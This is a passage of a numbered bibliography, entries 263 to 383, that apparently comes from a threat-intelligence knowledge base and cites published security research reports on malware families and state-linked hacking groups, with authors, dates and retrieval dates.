  263. Proofpoint Staff. (2016, August 25). Nightmare on Tor Street: Ursnif variant Dreambot adds Tor functionality. Retrieved June 5, 2019. 

  264. Mandiant Israel Research Team. (2022, August 17). Suspected Iranian Actor Targeting Israeli Shipping, Healthcare, Government and Energy Sectors. Retrieved September 21, 2022. 

  265. GReAT. (2021, June 16). Ferocious Kitten: 6 Years of Covert Surveillance in Iran. Retrieved September 22, 2021. 

  266. Mercer, W., Rascagneres, P. (2017, April 03). Introducing ROKRAT. Retrieved May 21, 2018. 

  267. Pantazopoulos, N. (2018, November 8). RokRat Analysis. Retrieved May 21, 2020.

  268. Jazi, Hossein. (2021, January 6). Retrohunting APT37: North Korean APT used VBA self decode technique to inject RokRat. Retrieved March 22, 2022. 

  269. Singer, G. (2020, April 3). Threat Alert: Kinsing Malware Attacks Targeting Container Environments. Retrieved April 1, 2021. 

  270. Priego, A. (2021, July). THE BROTHERS GRIM: THE REVERSING TALE OF GRIMAGENT MALWARE USED BY RYUK. Retrieved July 16, 2021. 

  271. F-Secure Labs. (2015, April 22). CozyDuke: Malware Analysis. Retrieved December 10, 2015. 

  272. Sardiwal, M, et al. (2017, December 7). New Targeted Attack in the Middle East by APT34, a Suspected Iranian Threat Group, Using CVE-2017-11882 Exploit. Retrieved December 20, 2017. 

  273. Davis, S. and Caban, D. (2017, December 19). APT34 - New Targeted Attack in the Middle East. Retrieved December 20, 2017. 

  274. Unit 42. (2022, June 13). GALLIUM Expands Targeting Across Telecommunications, Government and Finance Sectors With New PingPull Tool. Retrieved August 7, 2022. 

  275. Mundo, A. (2020, March 26). Ransomware Maze. Retrieved May 18, 2020. 

  276. SecureWorks. (2019, August 27). LYCEUM Takes Center Stage in Middle East Campaign. Retrieved November 19, 2019.

  277. Levene, B, et al. (2017, May 03). Kazuar: Multiplatform Espionage Backdoor with API Access. Retrieved July 17, 2018. 

  278. Wardle, Patrick. (2019, January 15). Middle East Cyber-Espionage analyzing WindShift’s implant: OSX.WindTail (part 2). Retrieved October 3, 2019. 

  279. CheckPoint Research. (2021, July 1). IndigoZebra APT continues to attack Central Asia with evolving tools. Retrieved September 24, 2021. 

  280. Tomcik, R. et al. (2022, February 24). Left On Read: Telegram Malware Spotted in Latest Iranian Cyber Espionage Activity. Retrieved August 18, 2022. 

  281. Falcone, R. and Lee, B. (2016, May 26). The OilRig Campaign: Attacks on Saudi Arabian Organizations Deliver Helminth Backdoor. Retrieved May 3, 2017.

  282. Falcone, R. (2016, November 30). Shamoon 2: Return of the Disttrack Wiper. Retrieved January 11, 2017.

  283. Falcone, R., et al. (2020, March 3). Molerats Delivers Spark Backdoor to Government and Telecommunications Organizations. Retrieved December 14, 2020. 

  284. Brumaghin, E., et al. (2017, November 02). Poisoning the Well: Banking Trojan Targets Google Search Results. Retrieved November 5, 2018. 

  285. Ramin Nafisi. (2021, September 27). FoggyWeb: Targeted NOBELIUM malware leads to persistent backdoor. Retrieved October 4, 2021. 

  286. Moran, N., & Villeneuve, N. (2013, August 12). Survival of the Fittest: New York Times Attackers Evolve Quickly [Blog]. Retrieved November 12, 2014. 

  287. Sancho, D., et al. (2012, May 22). IXESHE An APT Campaign. Retrieved June 7, 2019. 

  288. Accenture. (2020, October). Turla uses HyperStack, Carbon, and Kazuar to compromise government entity. Retrieved December 2, 2020. 

  289. GReAT. (2019, August 12). Recent Cloud Atlas activity. Retrieved May 8, 2020. 

  290. Kaspersky Lab’s Global Research and Analysis Team. (2015, December 4). Sofacy APT hits high profile targets with updated toolset. Retrieved December 10, 2015. 

  291. Sherstobitoff, R., Malhotra, A., et al. (2018, December 18). Operation Sharpshooter Campaign Targets Global Defense, Critical Infrastructure. Retrieved May 14, 2020.

  292. Kaspersky Lab. (2017, August). ShadowPad: popular server management software hit in supply chain attack. Retrieved March 22, 2021. 

  293. FireEye. (2018, March 16). Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries. Retrieved April 11, 2018. 

  294. Lambert, T. (2020, January 29). Intro to Netwire. Retrieved January 7, 2021. 

  295. Proofpoint. (2020, December 2). Geofenced NetWire Campaigns. Retrieved January 7, 2021. 

  296. Kimayong, P. (2020, June 18). COVID-19 and FMLA Campaigns used to install new IcedID banking malware. Retrieved July 14, 2020. 

  297. Fidelis Cybersecurity. (2015, December 16). Fidelis Threat Advisory #1020: Dissecting the Malware Involved in the INOCNATION Campaign. Retrieved March 24, 2016. 

  298. Falcone, R., et al. (2015, June 16). Operation Lotus Blossom. Retrieved February 15, 2016.

  299. Proofpoint Staff. (2018, March 7). Leaked Ammyy Admin Source Code Turned into Malware. Retrieved May 28, 2019. 

  300. Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020. 

  301. McLellan, T. and Moore, J. et al. (2021, April 29). UNC2447 SOMBRAT and FIVEHANDS Ransomware: A Sophisticated Financial Threat. Retrieved June 2, 2021. 

  302. Alintanahin, K. (2015). Operation Tropic Trooper: Relying on Tried-and-Tested Flaws to Infiltrate Secret Keepers. Retrieved June 14, 2019. 

  303. Duncan, B., Harbison, M. (2019, January 23). Russian Language Malspam Pushing Redaman Banking Malware. Retrieved June 16, 2020. 

  304. Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020. 

  305. Patil, S. (2018, June 26). Microsoft Office Vulnerabilities Used to Distribute FELIXROOT Backdoor in Recent Campaign. Retrieved July 31, 2018. 

  306. Hayashi, K. (2017, November 28). UBoatRAT Navigates East Asia. Retrieved January 12, 2018. 

  307. Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. Retrieved April 11, 2018. 

  308. The BlackBerry Research & Intelligence Team. (2020, October). BAHAMUT: Hack-for-Hire Masters of Phishing, Fake News, and Fake Apps. Retrieved February 8, 2021. 

  309. An, J and Malhotra, A. (2021, November 10). North Korean attackers use malicious blogs to deliver malware to high-profile South Korean targets. Retrieved December 29, 2021. 

  310. S2 Grupo. (2019, April 2). WIRTE Group attacking the Middle East. Retrieved May 24, 2019. 

  311. Cherepanov, Anton. (2019, November 10). ESETresearch discovered a trojanized IDA Pro installer. Retrieved March 2, 2022. 

  312. Pradhan, A. (2022, February 8). LolZarus: Lazarus Group Incorporating Lolbins into Campaigns. Retrieved March 22, 2022. 

  313. Saini, A. and Hossein, J. (2022, January 27). North Korea’s Lazarus APT leverages Windows Update client, GitHub in latest campaign. Retrieved January 27, 2022. 

  314. Sherstobitoff, R. (2018, February 12). Lazarus Resurfaces, Targets Global Banks and Bitcoin Users. Retrieved February 19, 2018. 

  315. Uptycs Threat Research Team. (2021, January 12). Confucius APT deploys Warzone RAT. Retrieved December 17, 2021. 

  316. Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020. 

  317. CERT-EE. (2021, January 27). Gamaredon Infection: From Dropper to Entry. Retrieved February 17, 2022. 

  318. Kakara, H., Maruyama, E. (2020, April 17). Gamaredon APT Group Use Covid-19 Lure in Campaigns. Retrieved May 19, 2020. 

  319. Symantec. (2022, January 31). Shuckworm Continues Cyber-Espionage Attacks Against Ukraine. Retrieved February 17, 2022. 

  320. Unit 42. (2022, February 3). Russia’s Gamaredon aka Primitive Bear APT Group Actively Targeting Ukraine. Retrieved February 21, 2022. 

  321. Smallridge, R. (2018, March 10). APT15 is alive and strong: An analysis of RoyalCli and RoyalDNS. Retrieved April 4, 2018. 

  322. Marczak, B. and Scott-Railton, J. (2016, May 29). Keep Calm and (Don’t) Enable Macros: A New Threat Actor Targets UAE Dissidents. Retrieved June 8, 2016.

  323. FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 6, 2018. 

  324. Martin Zugec. (2021, July 27). Deep Dive Into a FIN8 Attack - A Forensic Investigation. Retrieved September 1, 2021. 

  325. Anomali Threat Research. (2019, October 7). China-Based APT Mustang Panda Targets Minority Groups, Public and Private Sector Organizations. Retrieved April 12, 2021. 

  326. Counter Threat Unit Research Team. (2019, December 29). BRONZE PRESIDENT Targets NGOs. Retrieved April 13, 2021. 

  327. Insikt Group. (2020, July 28). CHINESE STATE-SPONSORED GROUP ‘REDDELTA’ TARGETS THE VATICAN AND CATHOLIC ORGANIZATIONS. Retrieved April 13, 2021. 

  328. Roccia, T., Seret, T., Fokker, J. (2021, March 16). Technical Analysis of Operation Dianxun. Retrieved April 13, 2021. 

  329. Moore, S. et al. (2020, April 30). Anomali Suspects that China-Backed APT Pirate Panda May Be Seeking Access to Vietnam Government Data Center. Retrieved May 19, 2020. 

  330. Chen, J. (2020, May 12). Tropic Trooper’s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020.

  331. ClearSky. (2019, June). Iranian APT group ‘MuddyWater’ Adds Exploits to Their Arsenal. Retrieved May 14, 2020. 

  332. Security Response Attack Investigation Team. (2019, March 27). Elfin: Relentless Espionage Group Targets Multiple Organizations in Saudi Arabia and U.S. Retrieved April 10, 2019.

  333. Jansen, W. (2021, January 12). Abusing cloud services to fly under the radar. Retrieved January 19, 2021.

  334. Ash, B., et al. (2018, June 26). RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families. Retrieved July 2, 2018. 

  335. GReAT. (2014, December 10). Cloud Atlas: RedOctober APT is back in style. Retrieved May 8, 2020. 

  336. Hegel, T. (2021, January 13). A Global Perspective of the SideWinder APT. Retrieved January 27, 2021. 

  337. Rewterz. (2020, April 20). Sidewinder APT Group Campaign Analysis. Retrieved January 29, 2021. 

  338. Rewterz. (2020, June 22). Analysis on Sidewinder APT Group – COVID-19. Retrieved January 29, 2021. 

  339. ESET, et al. (2018, January). Diplomats in Eastern Europe bitten by a Turla mosquito. Retrieved July 3, 2018. 

  340. ESET Research. (2018, May 22). Turla Mosquito: A shift towards more generic tools. Retrieved July 3, 2018. 

  341. Rusu, B. (2020, May 21). Iranian Chafer APT Targeted Air Transportation and Government in Kuwait and Saudi Arabia. Retrieved May 22, 2020. 

  342. FBI. (2020, September 17). Indicators of Compromise Associated with Rana Intelligence Computing, also known as Advanced Persistent Threat 39, Chafer, Cadelspy, Remexi, and ITG07. Retrieved December 10, 2020. 

  343. Dela Paz, R. (2016, October 21). BITTER: a targeted attack against Pakistan. Retrieved June 1, 2022. 

  344. Raghuprasad, C. (2022, May 11). Bitter APT adds Bangladesh to their targets. Retrieved June 1, 2022.

  345. MSTIC. (2021, March 2). HAFNIUM targeting Exchange Servers with 0-day exploits. Retrieved March 3, 2021. 

  346. NSA, CISA, FBI, NCSC. (2021, July). Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments. Retrieved July 26, 2021. 

  347. Frydrych, M. (2020, April 14). TA505 Continues to Infect Networks With SDBbot RAT. Retrieved May 29, 2020. 

  348. Positive Technologies. (2016, December 16). Cobalt Snatch. Retrieved October 9, 2018. 

  349. Matveeva, V. (2017, August 15). Secrets of Cobalt. Retrieved October 10, 2018. 

  350. Ahl, I. (2017, June 06). Privileges and Credentials: Phished at the Request of Counsel. Retrieved May 17, 2018. 

  351. Grunzweig, J., Lee, B. (2016, January 22). New Attacks Linked to C0d0so0 Group. Retrieved August 2, 2018. 

  352. Cherepanov, A. (2016, December 13). The rise of TeleBots: Analyzing disruptive KillDisk attacks. Retrieved June 10, 2020.

  353. John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020. 

  354. Symantec Security Response Attack Investigation Team. (2018, April 23). Orangeworm: Indicators of Compromise. Retrieved July 8, 2018. 

  355. Unit42. (2016). SILVERTERRIER: THE RISE OF NIGERIAN BUSINESS EMAIL COMPROMISE. Retrieved November 13, 2018. 

  356. Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019. 

  357. Vengerik, B. & Dennesen, K. (2014, December 5). Hacking the Street? FIN4 Likely Playing the Market. Retrieved January 15, 2019.

  358. Vengerik, B. et al. (2014, December 5). Hacking the Street? FIN4 Likely Playing the Market. Retrieved December 17, 2018.

  359. DFIR Report. (2021, November 15). Exchange Exploit Leads to Domain Wide Ransomware. Retrieved January 5, 2023. 

  360. DFIR Report. (2022, March 21). APT35 Automates Initial Access Using ProxyShell. Retrieved May 25, 2022. 

  361. Lee, B. and Falcone, R. (2017, February 15). Magic Hound Campaign Attacks Saudi Targets. Retrieved December 27, 2017. 

  362. Legezo, D. (2018, June 13). LuckyMouse hits national data center to organize country-level waterholing campaign. Retrieved August 18, 2018. 

  363. Lassalle, D., et al. (2017, November 6). OceanLotus Blossoms: Mass Digital Surveillance and Attacks Targeting ASEAN, Asian Nations, the Media, Human Rights Groups, and Civil Society. Retrieved November 6, 2017. 

  364. Glyer, C, et al. (2020, March). This Is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved April 28, 2020. 

  365. Bromiley, M., et al. (2019, July 18). Hard Pass: Declining APT34’s Invite to Join Their Professional Network. Retrieved August 26, 2019.

  366. Unit42. (2016, May 1). Evasive Serpens Unit 42 Playbook Viewer. Retrieved February 6, 2023. 

  367. Lechtik, M., et al. (2021, July 14). LuminousMoth APT: Sweeping attacks for the chosen few. Retrieved October 20, 2022.

  368. Grunzweig, J., et al. (2016, May 24). New Wekby Attacks Use DNS Requests As Command and Control Mechanism. Retrieved November 15, 2018. 

  369. Malwarebytes Threat Intelligence Team. (2020, June 4). New LNK attack tied to Higaisa APT discovered. Retrieved March 2, 2021. 

  370. Singh, S., Singh, A. (2020, June 11). The Return on the Higaisa APT. Retrieved March 2, 2021.

  371. Cado Security. (2020, August 16). Team TNT – The First Crypto-Mining Worm to Steal AWS Credentials. Retrieved September 22, 2021. 

  372. Darin Smith. (2022, April 21). TeamTNT targeting AWS, Alibaba. Retrieved August 4, 2022. 

  373. Fiser, D., Oliveira, A. (n.d.). Tracking the Activities of TeamTNT A Closer Look at a Cloud-Focused Malicious Actor Group. Retrieved September 22, 2021.

  374. Fishbein, N. (2020, September 8). Attackers Abusing Legitimate Cloud Monitoring Tools to Conduct Cyber Attacks. Retrieved September 22, 2021. 

  375. Mercer, W., Rascagneres, P. (2018, January 16). Korea In The Crosshairs. Retrieved May 21, 2018. 

  376. Dantzig, M. v., Schamper, E. (2019, December 19). Operation Wocao: Shining a light on one of China’s hidden hacking groups. Retrieved October 8, 2020. 

  377. Dunwoody, M., et al. (2018, November 19). Not So Cozy: An Uncomfortable Examination of a Suspected APT29 Phishing Campaign. Retrieved November 27, 2018. 

  378. Costa, F. (2022, May 1). RaaS AvosLocker Incident Response Analysis. Retrieved January 11, 2023. 

  379. McAfee® Foundstone® Professional Services and McAfee Labs™. (2011, February 10). Global Energy Cyberattacks: “Night Dragon”. Retrieved February 19, 2018. 

  380. Cybereason Nocturnus. (2022, May 4). Operation CuckooBees: Deep-Dive into Stealthy Winnti Techniques. Retrieved September 22, 2022. 

  381. Cash, D. et al. (2020, December 14). Dark Halo Leverages SolarWinds Compromise to Breach Organizations. Retrieved December 29, 2020. 

  382. Cashman, M. (2020, July 29). Operation North Star Campaign. Retrieved December 20, 2021. 

  383. Adamitis, D. et al. (2019, June 4). It’s alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign. Retrieved May 11, 2020.